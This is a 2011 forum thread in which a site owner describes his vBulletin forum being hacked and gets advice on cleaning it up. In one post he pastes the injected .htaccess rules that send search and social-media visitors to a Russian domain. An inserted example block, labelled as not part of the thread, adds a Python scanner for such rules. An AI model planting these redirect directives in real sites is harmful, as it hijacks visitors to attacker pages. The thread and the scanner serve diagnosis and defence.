
LOL I've Been Hacked, How Do I Patch Up

Discussion in 'BlackHat Lounge' started by sapo, Dec 16, 2011.

  1. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    My site has been hacked.

    They added a simple hidden iframe in the footer of my vBulletin forum, not for the first time. I usually just delete it and move on. But this time they attacked like crazy: they changed all my .htaccess files to some rewrite to some .ru site. I am asking how they can do this; I changed all my passwords, etc.

    Well, better than how: how can I fix the holes in my site, or will I have to hire someone to go through it or something?
     
  2. scraper1

    scraper1 Regular Member

    Joined:
    May 28, 2011
    Messages:
    214
    Likes Received:
    207
    Location:
    Kontiki
    Home Page:
    Make sure you have all the updates for plugins and CMS, strong passwords (and don't re-use them), don't leave uploading scripts that can get indexed or the default install directory and scripts, make sure your desktop has a proper firewall and antivirus, use secure transmission protocols over the network like SSH, use the best encryption for your wireless network (if it's the case). These are only some ideas I can think of at the moment.

    The thing is that there are so many attack vectors out there and so many possibilities to get owned that you must be constantly vigilant and not let your guard down.

    Even so, if the bad guys manage to get a foothold on a site hosted on the same server as yours, you can still get owned due to that weak link in the chain.
     
  3. joeyblogz

    joeyblogz Registered Member

    Joined:
    Feb 18, 2011
    Messages:
    56
    Likes Received:
    59
    Occupation:
    Web consultant
    Location:
    bucktown
    You need to find and patch the hole(s). I'd check your log files. It could be many things... hard to determine from the info you provided. Maybe restore from backup?
     
  4. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    Fuck, I don't know what to do. Just got owned again; thought I fixed everything and shit. The site was only normal for about 5 minutes and bam, got hit again.
     
  5. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    LOL, and fucking HostGator is hilarious: they said they can't help me till I remove all malware coding and get the "this site may cause harm" warning removed from Google before they can start to diagnose what is wrong. LMFAO, wtf is that.
     
  6. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    FUCK
    Code:
    aboutconvert.ru
     
  7. bwman

    bwman Power Member

    Joined:
    Sep 4, 2011
    Messages:
    737
    Likes Received:
    377
    Occupation:
    Jack of all Trades - Master of all
    Location:
    IM WORLD
    ''LOL'' you've been hacked?

    lol
     
  8. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    Well, it ain't actually funny, but after all these years of having sites I've never been hacked, and they do it to more of a hobby site than anything.

    They keep changing my .htaccess to this:

    Code:
    ErrorDocument 400 http://aboutconvert.ru/kernel/index.php
    ErrorDocument 401 http://aboutconvert.ru/kernel/index.php
    ErrorDocument 403 http://aboutconvert.ru/kernel/index.php
    ErrorDocument 404 http://aboutconvert.ru/kernel/index.php
    ErrorDocument 500 http://aboutconvert.ru/kernel/index.php

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing)\.(.*)
    RewriteRule ^(.*)$ http://aboutconvert.ru/kernel/index.php [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|metabot|dmoz|euroseek|about|icq)\.(.*)
    RewriteRule ^(.*)$ http://aboutconvert.ru/kernel/index.php [R=301,L]
    </IfModule>
     
  9. izzaboo

    izzaboo Newbie

    Joined:
    Dec 17, 2011
    Messages:
    0
    Likes Received:
    0
    Take a look at the encoding and filesize of the .htaccess files.

    I don't know what it was or how it got in but I seem to have had some luck (so far, knock on wood) with deleting .htaccess files and writing new ones.

    We'll see how long it lasts...
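
Added example, not part of any post in this thread: a Python check for the kind of .htaccess changes shown in post 8 (off-site `ErrorDocument` targets and referer-gated `RewriteRule` redirects). It also flags long whitespace runs, which inflate file size, on the assumption that this is what the reply above is hinting at. The sample input is constructed and uses the placeholder host `redirect.example`; all function names are this example's own.

```python
import re
from pathlib import Path

PADDING = re.compile(r"[ \t]{20,}")  # long whitespace runs that push directives out of view
ABS_URL = re.compile(r"https?://([^/:\s]+)", re.I)  # captures the host of an absolute URL

def _offsite_host(target, own_hosts):
    m = ABS_URL.match(target.strip("\"'"))
    host = m.group(1).lower() if m else ""
    return host if host and host not in own_hosts else None

def scan_htaccess(text, own_hosts=()):
    """Return (line_no, finding, host) tuples for one .htaccess body."""
    own = {h.lower() for h in own_hosts}
    findings, referer_cond = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        if PADDING.search(raw):
            findings.append((no, "whitespace-padding", ""))
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        host = _offsite_host(parts[2], own) if len(parts) >= 3 else None
        if directive == "errordocument" and host:
            findings.append((no, "offsite-errordocument", host))
        elif directive == "rewritecond" and "http_referer" in raw.lower():
            referer_cond = True  # conditions apply to the next RewriteRule
        elif directive == "rewriterule":
            if host:
                kind = "referer-gated-redirect" if referer_cond else "offsite-redirect"
                findings.append((no, kind, host))
            referer_cond = False  # a RewriteRule ends the condition chain
    return findings

def scan_tree(root, own_hosts=()):
    """Map each flagged .htaccess under root to its findings."""
    out = {}
    for p in Path(root).rglob(".htaccess"):
        hits = scan_htaccess(p.read_text(encoding="utf-8", errors="replace"), own_hosts)
        if hits:
            out[str(p)] = hits
    return out

# Constructed sample modelled on the directives in post 8 (placeholder host).
SAMPLE = (
    "ErrorDocument 404 http://redirect.example/kernel/index.php\n"
    + "\t" * 30 + "RewriteCond %{HTTP_REFERER} ^.*(google|bing)\\.(.*)\n"
    "RewriteRule ^(.*)$ http://redirect.example/kernel/index.php [R=301,L]\n"
)
```

Pass the site's own hostnames as `own_hosts` so legitimate absolute redirects are not reported, and run `scan_tree` over the whole webroot, since every directory can carry its own .htaccess.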
     
  10. Kickflip

    Kickflip BANNED BANNED

    Joined:
    Jan 29, 2010
    Messages:
    2,038
    Likes Received:
    2,465
    Do you have all legal and paid for copies of the scripts/software you are using?
     
  11. sapo

    sapo Power Member

    Joined:
    Feb 25, 2008
    Messages:
    510
    Likes Received:
    281
    Yes I do. I have pinpointed where they were coming in from: it was a plugin, poorly written, or I guess good but I was not using it on the version it was intended to be used on, so I disabled that directory and deleted the plugin. Changed all passwords, fixed all .htaccess files, and everything seems back to normal. Fucking 18 hours later, NO SLEEP, but it was worth it. I love this site.